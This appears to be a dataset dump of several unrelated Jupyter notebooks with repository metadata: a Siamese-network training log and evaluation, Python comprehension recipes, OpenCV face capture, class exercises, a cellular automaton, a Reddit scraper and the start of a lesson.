- ETA: 0s - loss: 0.0349\nEpoch 00024: val_loss improved from 0.03581 to 0.03299, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-24-0.03.h5\n234/234 [==============================] - 168s 716ms/step - loss: 0.0349 - val_loss: 0.0330\nEpoch 25/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0342\nEpoch 00025: val_loss did not improve from 0.03299\n234/234 [==============================] - 164s 700ms/step - loss: 0.0342 - val_loss: 0.0337\nEpoch 26/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0329\nEpoch 00026: val_loss did not improve from 0.03299\n234/234 [==============================] - 166s 711ms/step - loss: 0.0330 - val_loss: 0.0353\nEpoch 27/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0330\nEpoch 00027: val_loss improved from 0.03299 to 0.03299, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-27-0.03.h5\n234/234 [==============================] - 169s 723ms/step - loss: 0.0330 - val_loss: 0.0330\nEpoch 28/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0328\nEpoch 00028: val_loss did not improve from 0.03299\n234/234 [==============================] - 167s 716ms/step - loss: 0.0328 - val_loss: 0.0335\nEpoch 29/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0328\nEpoch 00029: val_loss improved from 0.03299 to 0.03119, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-29-0.03.h5\n234/234 [==============================] - 168s 719ms/step - loss: 0.0328 - val_loss: 0.0312\nEpoch 30/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0318\nEpoch 00030: val_loss improved from 0.03119 to 0.03046, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-30-0.03.h5\n234/234 [==============================] - 167s 714ms/step - loss: 0.0319 - val_loss: 0.0305\nEpoch 31/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0317\nEpoch 00031: val_loss did not improve from 0.03046\n234/234 [==============================] - 168s 719ms/step - loss: 0.0317 - val_loss: 0.0320\nEpoch 32/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0312\nEpoch 00032: val_loss did not improve from 0.03046\n234/234 [==============================] - 165s 703ms/step - loss: 0.0312 - val_loss: 0.0316\nEpoch 33/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0312\nEpoch 00033: val_loss improved from 0.03046 to 0.03021, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-33-0.03.h5\n234/234 [==============================] - 170s 726ms/step - loss: 0.0312 - val_loss: 0.0302\nEpoch 34/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0317\nEpoch 00034: val_loss did not improve from 0.03021\n234/234 [==============================] - 170s 727ms/step - loss: 0.0317 - val_loss: 0.0313\nEpoch 35/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0315\nEpoch 00035: val_loss did not improve from 0.03021\n234/234 [==============================] - 167s 715ms/step - loss: 0.0315 - val_loss: 0.0307\nEpoch 36/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0313\nEpoch 00036: val_loss improved from 0.03021 to 0.02951, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-36-0.03.h5\n234/234 [==============================] - 169s 722ms/step - loss: 0.0313 - val_loss: 0.0295\nEpoch 37/100\n233/234 [============================>.] 
- ETA: 0s - loss: 0.0312\nEpoch 00037: val_loss did not improve from 0.02951\n234/234 [==============================] - 166s 710ms/step - loss: 0.0312 - val_loss: 0.0305\nEpoch 38/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0307\nEpoch 00038: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0307 - val_loss: 0.0304\nEpoch 39/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0308\nEpoch 00039: val_loss did not improve from 0.02951\n234/234 [==============================] - 165s 707ms/step - loss: 0.0308 - val_loss: 0.0318\nEpoch 40/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0312\nEpoch 00040: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0312 - val_loss: 0.0305\nEpoch 41/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0309\nEpoch 00041: val_loss did not improve from 0.02951\n234/234 [==============================] - 166s 711ms/step - loss: 0.0309 - val_loss: 0.0303\nEpoch 42/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0305\nEpoch 00042: val_loss did not improve from 0.02951\n234/234 [==============================] - 164s 700ms/step - loss: 0.0305 - val_loss: 0.0296\nEpoch 43/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0307\nEpoch 00043: val_loss did not improve from 0.02951\n234/234 [==============================] - 166s 710ms/step - loss: 0.0307 - val_loss: 0.0301\nEpoch 44/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0308\nEpoch 00044: val_loss did not improve from 0.02951\n234/234 [==============================] - 169s 721ms/step - loss: 0.0308 - val_loss: 0.0299\nEpoch 45/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0305\nEpoch 00045: val_loss did not improve from 0.02951\n234/234 [==============================] - 169s 722ms/step - loss: 0.0305 - val_loss: 0.0307\nEpoch 46/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0309\nEpoch 00046: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0309 - val_loss: 0.0298\nEpoch 47/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0305\nEpoch 00047: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0306 - val_loss: 0.0299\nEpoch 48/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0302\nEpoch 00048: val_loss did not improve from 0.02951\n234/234 [==============================] - 167s 713ms/step - loss: 0.0302 - val_loss: 0.0302\nEpoch 49/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0307\nEpoch 00049: val_loss improved from 0.02951 to 0.02931, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-49-0.03.h5\n234/234 [==============================] - 169s 720ms/step - loss: 0.0307 - val_loss: 0.0293\nEpoch 50/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0306\nEpoch 00050: val_loss did not improve from 0.02931\n234/234 [==============================] - 167s 714ms/step - loss: 0.0306 - val_loss: 0.0299\nEpoch 51/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0302\nEpoch 00051: val_loss improved from 0.02931 to 0.02882, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-51-0.03.h5\n234/234 [==============================] - 167s 712ms/step - loss: 0.0302 - val_loss: 0.0288\nEpoch 52/100\n233/234 [============================>.] 
- ETA: 0s - loss: 0.0308\nEpoch 00052: val_loss did not improve from 0.02882\n234/234 [==============================] - 166s 710ms/step - loss: 0.0308 - val_loss: 0.0296\nEpoch 53/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0304\nEpoch 00053: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 714ms/step - loss: 0.0304 - val_loss: 0.0303\nEpoch 54/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0304\nEpoch 00054: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 712ms/step - loss: 0.0304 - val_loss: 0.0299\nEpoch 55/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0300\nEpoch 00055: val_loss did not improve from 0.02882\n234/234 [==============================] - 166s 707ms/step - loss: 0.0300 - val_loss: 0.0294\nEpoch 56/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0304\nEpoch 00056: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 715ms/step - loss: 0.0304 - val_loss: 0.0300\nEpoch 57/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0306\nEpoch 00057: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 713ms/step - loss: 0.0306 - val_loss: 0.0295\nEpoch 58/100\n"
]
],
[
[
"### Evaluate the trained network\n\nLoad the best performing models. We need to load the weights and configs seperately rather than using model.load() as our custom loss function relies on the embedding length. As such, it is easier to load the weights and config seperately and build a model based on them.",
"_____no_output_____"
]
],
[
[
"def json_to_dict(json_src):\n with open(json_src, 'r') as j:\n return json.loads(j.read())",
"_____no_output_____"
],
[
"## Load in best trained SNN and emb model\n\n# The best performing model weights has the higher epoch number due to only saving the best weights\nhighest_epoch = 0\ndir_list = os.listdir(logdir)\n\nfor file in dir_list:\n if file.endswith(\".h5\"):\n epoch_num = int(file.split(\"-\")[1].split(\".h5\")[0])\n if epoch_num > highest_epoch:\n highest_epoch = epoch_num\n\n# Find the embedding and SNN weights src for the highest_epoch (best) model\nfor file in dir_list:\n # Zfill ensure a leading 0 on number < 10\n if (\"-\" + str(highest_epoch).zfill(2)) in file:\n if file.startswith(\"emb\"):\n embedding_weights_src = os.path.join(logdir, file)\n elif file.startswith(\"snn\"):\n snn_weights_src = os.path.join(logdir, file)\n\nhyperparams = os.path.join(logdir, \"hyperparams.json\")\nsnn_config = os.path.join(logdir, \"siamese_config.json\")\nemb_config = os.path.join(logdir, \"embedding_config.json\")\n\nsnn_config = json_to_dict(snn_config)\nemb_config = json_to_dict(emb_config)\n\n# json.dumps to make the dict a string, as required by model_from_json\nloaded_snn_model = model_from_json(json.dumps(snn_config))\nloaded_snn_model.load_weights(snn_weights_src)\n\nloaded_emb_model = model_from_json(json.dumps(emb_config))\nloaded_emb_model.load_weights(embedding_weights_src)\n\n\n# Store visualisations of the embeddings using PCA for display next to \"after training\" for comparisons\nembeddings_after_train = loaded_emb_model.predict(x_test[:num_vis, :])\npca = PCA(n_components=2)\ndecomposed_embeddings_after = pca.fit_transform(embeddings_after_train)\nevaluate(loaded_emb_model, highest_epoch)",
"_____no_output_____"
]
],
[
[
"### Comparisons of the embeddings in the latent space\n\nBased on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).",
"_____no_output_____"
]
],
[
[
"step = 1 # Step = 1, take every element\n\ndict_embeddings = {}\ndict_gray = {}\ntest_class_labels = np.unique(np.array(y_test))\n\ndecomposed_embeddings_after = pca.fit_transform(embeddings_after_train)\n\nfig = plt.figure(figsize=(16, 8))\nfor label in test_class_labels:\n \n y_test_labels = y_test[:num_vis]\n \n decomposed_embeddings_class_before = decomposed_embeddings_before[y_test_labels == label]\n decomposed_embeddings_class_after = decomposed_embeddings_after[y_test_labels == label]\n \n plt.subplot(1,2,1)\n plt.scatter(decomposed_embeddings_class_before[::step, 1], decomposed_embeddings_class_before[::step, 0], label=str(label))\n plt.title('Embedding Locations Before Training')\n plt.legend()\n\n plt.subplot(1,2,2)\n plt.scatter(decomposed_embeddings_class_after[::step, 1], decomposed_embeddings_class_after[::step, 0], label=str(label))\n plt.title('Embedding Locations After %d Training Epochs' % epochs)\n plt.legend()\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Determine n_way_accuracy",
"_____no_output_____"
]
],
[
[
"prototypes = generate_prototypes(x_test, y_test, loaded_emb_model)\nn_way_accuracy_prototypes(val_steps, num_classes, loaded_emb_model)\n",
"_____no_output_____"
]
],
[
[
"### Visualise support set inference\n\nBased on code found [here](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).",
"_____no_output_____"
]
],
[
[
"n_samples = 10\nsample_imgs, min_index = visualise_n_way_prototypes(n_samples, loaded_emb_model)\n\nimg_matrix = []\nfor index in range(1, len(sample_imgs)):\n img_matrix.append(np.reshape(sample_imgs[index], (x_train_w, x_train_h)))\n\nimg_matrix = np.asarray(img_matrix)\nimg_matrix = np.vstack(img_matrix)\n\nf, ax = plt.subplots(1, 3, figsize = (10, 12))\nf.tight_layout()\nax[0].imshow(np.reshape(sample_imgs[0], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\nax[0].set_title(\"Test Image\")\nax[1].imshow(img_matrix ,vmin=0, vmax=1,cmap='Greys')\nax[1].set_title(\"Support Set (Img of same class shown first)\")\nax[2].imshow(np.reshape(sample_imgs[min_index], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\nax[2].set_title(\"Image most similar to Test Image in Support Set\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4f9b0f64480d79ac91f1b1834b15897535219c | 3,956 | ipynb | Jupyter Notebook | python3_recipes/notebooks/_1_Sequences/_3_sequence_comprehension.ipynb | geekgap-io/python3_recipes | b92c82567e4ba59b67121047f6c543d462ee3056 | [
"MIT"
] | 2 | 2019-09-08T08:58:25.000Z | 2021-09-01T04:45:43.000Z | python3_recipes/notebooks/_1_Sequences/_3_sequence_comprehension.ipynb | geekgap-io/python3_recipes | b92c82567e4ba59b67121047f6c543d462ee3056 | [
"MIT"
] | null | null | null | python3_recipes/notebooks/_1_Sequences/_3_sequence_comprehension.ipynb | geekgap-io/python3_recipes | b92c82567e4ba59b67121047f6c543d462ee3056 | [
"MIT"
] | 1 | 2021-09-01T04:43:59.000Z | 2021-09-01T04:43:59.000Z | 26.72973 | 167 | 0.570779 | [
[
[
"## Problem\n- Uppercasing all the comments without using map",
"_____no_output_____"
]
],
[
[
"comments = [\n 'Python3 is awesome',\n 'Indeed, python3 is great',\n 'Absolutely ... Could not agree more !'\n]",
"_____no_output_____"
]
],
[
[
"## Answer\n- we can use sequence comprehension which are much more concise and readable",
"_____no_output_____"
]
],
[
[
"# uppercased_comments = list(map(lambda comment: comment.upper(), comments))\nuppercased_comments1 = [comment.upper() for comment in comments] #<0>\n\n# uppercased_comments = list(map(str.upper, comments))\nuppercased_comments2 = [str.upper(comment) for comment in comments] #<1>\n\n\nprint(comments) #<2>\nprint(uppercased_comments1)\nprint(uppercased_comments2)",
"['Python3 is awesome', 'Indeed, python3 is great', 'Absolutely ... Could not agree more !']\n['PYTHON3 IS AWESOME', 'INDEED, PYTHON3 IS GREAT', 'ABSOLUTELY ... COULD NOT AGREE MORE !']\n['PYTHON3 IS AWESOME', 'INDEED, PYTHON3 IS GREAT', 'ABSOLUTELY ... COULD NOT AGREE MORE !']\n"
]
],
[
[
"## Discussion\n- <0> list comprehension: each element of the new list being a transformation of the original one using the .upper() of the object\n- <1> list comprehension: each element of the new list being a transformation of the original one using the str.upper() function\n- <0, 1> both ways are much more cleaner and concise than the approach using map (see recipe 2.2)\n- <2> The original comments list is unchanged",
"_____no_output_____"
],
[
"## Problem\n- Filtering only the comments with strictly more than 20 characters without using filter",
"_____no_output_____"
],
[
"## Answer\n- we can use sequence comprehension with an if clause",
"_____no_output_____"
]
],
[
[
"# filtered_comments = list(filter(lambda comment: len(comment) > 20, comments))\nfiltered_comments = [comment for comment in comments if len(comment) > 20] #<0>\n\nprint(filtered_comments)\nprint(comments) #<1>",
"['Indeed, python3 is great', 'Absolutely ... Could not agree more !']\n['Python3 is awesome', 'Indeed, python3 is great', 'Absolutely ... Could not agree more !']\n"
]
],
[
[
"## Discussion\n- <0> adding an if clause to the element of the original list on the right hand side of the comprehension enables filtering which ones appear on the left side\n- <1> The original comments list is unchanged",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb4f9c25bc9571c4a02a9322a018cf7718f501d6 | 4,243 | ipynb | Jupyter Notebook | face-detection-and-data-creation.ipynb | psantheus/face-detection-cv2 | e0731e0da44b855da31458d6e5e397f35b5bacb1 | [
"MIT"
] | null | null | null | face-detection-and-data-creation.ipynb | psantheus/face-detection-cv2 | e0731e0da44b855da31458d6e5e397f35b5bacb1 | [
"MIT"
] | null | null | null | face-detection-and-data-creation.ipynb | psantheus/face-detection-cv2 | e0731e0da44b855da31458d6e5e397f35b5bacb1 | [
"MIT"
] | 1 | 2021-05-28T16:52:18.000Z | 2021-05-28T16:52:18.000Z | 32.389313 | 116 | 0.581428 | [
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as image\nimport os\nimport cv2",
"_____no_output_____"
],
[
"capture = cv2.VideoCapture(0)",
"_____no_output_____"
],
[
"face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_alt.xml')",
"_____no_output_____"
],
[
"#Iterate to save data for each face\nface_data = []\nface_name = input(\"Enter face name :\")\n\nface_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_alt.xml')\ndataset_path = './data/'\n\n#non-unique count, faces captured in total\nfacecount = 0\nwhile True:\n #ret is a return code, frame is the frame captured\n ret, frame = capture.read()\n #convert to grayscale if needed\n grayscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #ret is false if frame was not captured properly, so we ignore that particular frame\n if ret == False:\n continue\n #stores the faces coordinates in rectangle start, width and height\n faces = face_cascade.detectMultiScale(grayscale, 1.3, 5)\n #iterating over each face detected in that particular frame\n for face in faces:\n #extracting our values from face\n x,y,w,h = face\n #offset value to increase our displayed rectangle size\n offset = 50\n #creating a rectangle using the coordinates known, top-left and bottom-right, color, and width\n cv2.rectangle(grayscale, (x - offset, y - offset), (x+w+offset, y+h+offset), (255,255,255), 4)\n #Slice of frame to select out face part\n face_section = grayscale[y - offset : y + h + offset, x - offset : x + w + offset]\n #resizing face section to a particular standard so that we will be able to apply KNN later\n face_section = cv2.resize(face_section, (100,100))\n #Storing facial data\n face_data.append(face_section)\n #increment facecount, better to interpret as framecount or size of training data\n facecount += 1\n print(facecount)\n cv2.imshow(\"Face Detection\", grayscale)\n #first and operation basically gets key from user and compares it to binary equivalent of mentioned key\n #loop breaks if key matches\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n#releases capture interface\ncapture.release()\n#closes any windows created, not doing so will cause process to freeze\ncv2.destroyAllWindows()\n\n#convert tuple to numpy array\nface_data = np.asarray(face_data)\n#resize, flattening to 1d rows, -1 causes other dimensions to adjust in favor of mantaining specified ones\nface_data = face_data.reshape((face_data.shape[0],-1))\nprint(np.shape(face_data))\n\n#saving data to path\nnp.save(dataset_path + face_name, face_data)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
cb4fa52a0cbdb4707f78da3407e02bea9c80866d | 4,911 | ipynb | Jupyter Notebook | Discussion Section Notes/Discussion Week 1.ipynb | amichuda/are106-python | 99f66ebb0a7689c1b01ce7f448bdce86c869131d | [
"MIT"
] | 1 | 2020-11-26T18:03:45.000Z | 2020-11-26T18:03:45.000Z | Discussion Section Notes/Discussion Week 1.ipynb | amichuda/are106-python | 99f66ebb0a7689c1b01ce7f448bdce86c869131d | [
"MIT"
] | null | null | null | Discussion Section Notes/Discussion Week 1.ipynb | amichuda/are106-python | 99f66ebb0a7689c1b01ce7f448bdce86c869131d | [
"MIT"
] | null | null | null | 16.424749 | 114 | 0.401955 | [
[
[
"# Question 1",
"_____no_output_____"
]
],
[
[
"string = \" Hello World\"\nprint(string)\n\nstring*3",
" Hello World\n"
]
],
[
[
"# Question 2",
"_____no_output_____"
]
],
[
[
"looper = [1,2,3,4,6,8]\n\nfor thing in looper:\n print(thing)\n \nfor thing in string:\n print(thing)\n \nstring_n = \"123468\"\n\nfor thing in string_n:\n print(thing)\n",
"1\n2\n3\n4\n6\n8\n \nH\ne\nl\nl\no\n \nW\no\nr\nl\nd\n1\n2\n3\n4\n6\n8\n"
]
],
[
[
"# Question 3",
"_____no_output_____"
]
],
[
[
"def f(x):\n y = x**2\n return y\n\nf(4)",
"_____no_output_____"
]
],
[
[
"# Question 4",
"_____no_output_____"
]
],
[
[
"a = [1,2,3]\n\n#f(a)\n#I tried to plug a list into my f function, it didn't work so I wrote a loop and hopefully that will work\n\nz = []\n\nfor thing in a:\n thing_sq = thing**2\n z.append(thing_sq)\n \nprint(z)\n \ndef f_list(x):\n y = []\n for thing in x:\n thing_sq = thing**2\n y.append(thing_sq)\n return y\n\nprint(f_list(a))",
"[1, 4, 9]\n[1, 4, 9]\n"
]
],
[
[
"# Question 5",
"_____no_output_____"
]
],
[
[
"b = [thing**2 for thing in a]\nprint(b)\n\nc = [f(thing) for thing in a]\nprint(c)",
"[1, 4, 9]\n[1, 4, 9]\n"
]
],
[
[
"# Question 6",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\na_np = np.array(a)\nprint(a)\nprint(a_np)\n\na_np**2\n\n",
"[1, 2, 3]\n[1 2 3]\n"
]
],
[
[
"# Question 7",
"_____no_output_____"
]
],
[
[
"list = [1,7,100]\nnp_list = np.array(list)\n\nnp_list.mean()\nnp_list.var()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4faafaa570cfc3f2385cb25f7718cbd4af6f57 | 2,954 | ipynb | Jupyter Notebook | 001-Jupyter/001-Tutorials/002-IPython-Cookbook/chapter12_deterministic/02_cellular.ipynb | willirath/jupyter-jsc-notebooks | e64aa9c6217543c4ffb5535e7a478b2c9457629a | [
"BSD-3-Clause"
] | null | null | null | 001-Jupyter/001-Tutorials/002-IPython-Cookbook/chapter12_deterministic/02_cellular.ipynb | willirath/jupyter-jsc-notebooks | e64aa9c6217543c4ffb5535e7a478b2c9457629a | [
"BSD-3-Clause"
] | null | null | null | 001-Jupyter/001-Tutorials/002-IPython-Cookbook/chapter12_deterministic/02_cellular.ipynb | willirath/jupyter-jsc-notebooks | e64aa9c6217543c4ffb5535e7a478b2c9457629a | [
"BSD-3-Clause"
] | 1 | 2022-01-13T18:49:12.000Z | 2022-01-13T18:49:12.000Z | 25.465517 | 66 | 0.49763 | [
[
[
"# 12.2. Simulating an elementary cellular automaton",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
],
[
"u = np.array([[4], [2], [1]])",
"_____no_output_____"
],
[
"def step(x, rule_b):\n \"\"\"Compute a single stet of an elementary cellular\n automaton.\"\"\"\n # The columns contains the L, C, R values\n # of all cells.\n y = np.vstack((np.roll(x, 1), x,\n np.roll(x, -1))).astype(np.int8)\n # We get the LCR pattern numbers between 0 and 7.\n z = np.sum(y * u, axis=0).astype(np.int8)\n # We get the patterns given by the rule.\n return rule_b[7 - z]",
"_____no_output_____"
],
[
"def generate(rule, size=100, steps=100):\n \"\"\"Simulate an elementary cellular automaton given\n its rule (number between 0 and 255).\"\"\"\n # Compute the binary representation of the rule.\n rule_b = np.array(\n [int(_) for _ in np.binary_repr(rule, 8)],\n dtype=np.int8)\n x = np.zeros((steps, size), dtype=np.int8)\n # Random initial state.\n x[0, :] = np.random.rand(size) < .5\n # Apply the step function iteratively.\n for i in range(steps - 1):\n x[i + 1, :] = step(x[i, :], rule_b)\n return x",
"_____no_output_____"
],
[
"fig, axes = plt.subplots(3, 3, figsize=(8, 8))\nrules = [3, 18, 30,\n 90, 106, 110,\n 158, 154, 184]\nfor ax, rule in zip(axes.flat, rules):\n x = generate(rule)\n ax.imshow(x, interpolation='none',\n cmap=plt.cm.binary)\n ax.set_axis_off()\n ax.set_title(str(rule))",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb4fb8d6c784324ff83eb849292335d9b24c36a0 | 4,399 | ipynb | Jupyter Notebook | notebooks/01-scrape_data.ipynb | kingyiusuen/reddit-post-classification | accfe604a9fc24fa49bb0aa30add235553aaf0fa | [
"MIT"
] | 1 | 2021-08-05T17:00:19.000Z | 2021-08-05T17:00:19.000Z | notebooks/01-scrape_data.ipynb | kingyiusuen/reddit-post-classification | accfe604a9fc24fa49bb0aa30add235553aaf0fa | [
"MIT"
] | null | null | null | notebooks/01-scrape_data.ipynb | kingyiusuen/reddit-post-classification | accfe604a9fc24fa49bb0aa30add235553aaf0fa | [
"MIT"
] | null | null | null | 26.184524 | 326 | 0.544215 | [
[
[
"# Data Scraping",
"_____no_output_____"
]
],
[
[
"import json\nfrom pathlib import Path\n\nimport pandas as pd\nimport praw",
"_____no_output_____"
]
],
[
[
"To scrape posts from subreddits, you have to first put your reddit app's `client_id`, `client_secret` and `user_agent` in a `secrets.json` file in the project root directory. Here is [a blog post on the Reddit API](https://www.jcchouinard.com/get-reddit-api-credentials-with-praw/), in case you don't know what they are.",
"_____no_output_____"
]
],
[
[
"with open(\"../secrets.json\", \"r\") as f:\n secrets = json.load(f)\n\nCLIENT_ID = secrets[\"client_id\"]\nCLIENT_SECRET = secrets[\"client_secret\"]\nUSER_AGENT = secrets[\"user_agent\"]",
"_____no_output_____"
]
],
[
[
"Define some more configuration variables.",
"_____no_output_____"
]
],
[
[
"# Which subreddits to scrape\nSUBREDDIT_NAMES = [\"MachineLearning\", \"LearnMachineLearning\"]\n\n# The maximum number of posts to scrape per subreddit\n# Actual number may be smaller than this because some posts are link posts with no text\nLIMIT = 1000\n\n# Where the data should be saved\nOUTPUT_DIR = Path(\"../data/raw/\")\nOUTPUT_DIR.mkdir(parents=True, exist_ok=True)\nOUTPUT_FILEPATH = OUTPUT_DIR / \"reddit_posts.csv\"",
"_____no_output_____"
]
],
[
[
"A helper function for scraping a subreddit.",
"_____no_output_____"
]
],
[
[
"def scrape_one_subreddit(subreddit):\n posts = []\n for post in subreddit.new(limit=LIMIT):\n # Skip if the post is not a text post\n if not post.is_self:\n continue\n # Skip if the title is missing\n if not post.title:\n continue\n entry = {\n \"id\": post.id,\n \"created_utc\": post.created_utc,\n \"title\": post.title,\n \"selftext\": post.selftext,\n \"subreddit_name\": subreddit_name,\n }\n posts.append(entry)\n print(f\"Scraped {len(posts)} posts from r/{subreddit_name}\")\n return posts",
"_____no_output_____"
]
],
[
[
"Start scraping!",
"_____no_output_____"
]
],
[
[
"reddit = praw.Reddit(\n client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n user_agent=USER_AGENT,\n)\n\ndata = []\nfor subreddit_name in SUBREDDIT_NAMES:\n subreddit = reddit.subreddit(subreddit_name)\n data += scrape_one_subreddit(subreddit)\nheaders = [\"id\", \"created_utc\", \"title\", \"selftext\", \"subreddit_name\"]\ndf = pd.DataFrame(data, columns=headers)\ndf.to_csv(OUTPUT_FILEPATH, index=False)",
"Scraped 847 posts from r/MachineLearning\nScraped 715 posts from r/LearnMachineLearning\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4fc548450afe87450e6687c8ab44749960bafe | 41,738 | ipynb | Jupyter Notebook | gateway-lesson/gateway/gateway-exploration.ipynb | mohsenumn/lessons | a85aa31a76f1da422bfd7fd01eb6b40c82dcc989 | [
"BSD-3-Clause"
] | null | null | null | gateway-lesson/gateway/gateway-exploration.ipynb | mohsenumn/lessons | a85aa31a76f1da422bfd7fd01eb6b40c82dcc989 | [
"BSD-3-Clause"
] | null | null | null | gateway-lesson/gateway/gateway-exploration.ipynb | mohsenumn/lessons | a85aa31a76f1da422bfd7fd01eb6b40c82dcc989 | [
"BSD-3-Clause"
] | null | null | null | 33.3904 | 421 | 0.607121 | [
[
[
"# Gateway Exploration\n\nIn this final segment you can take what you have learned and try it yourself. This segment is displayed in \"Notebook Mode\" rather than \"Presentation Mode.\" So you will need to scroll down as you explore more content. Notebook mode will allow you to see more content at once. It also allows you to compare and contrast cells and visualizations. \n\nHere you are free to explore as much as you want. There are lots of suggestions in the text and in comments in the code cells. Feel free to change attributes, code pieces, etc. If a code cell breaks (e.g., you see an error), then use a search engine to look up the error to see if you can try to solve it yourself. Another way to fix problems is to compare your code to the original code, which you can see here:\n\nhttps://github.com/hourofci/lessons-dev/blob/master/gateway-lesson/gateway/gateway-exploration.ipynb\n\nEnjoy two explorations to apply what you learned at a deeper level\n1. Data Wrangling - View, Clean, Extract, and Merge Data\n2. Data Visualization - Making Maps\n\nSo start scrolling down. Explore and try it yourself!",
"_____no_output_____"
]
],
[
[
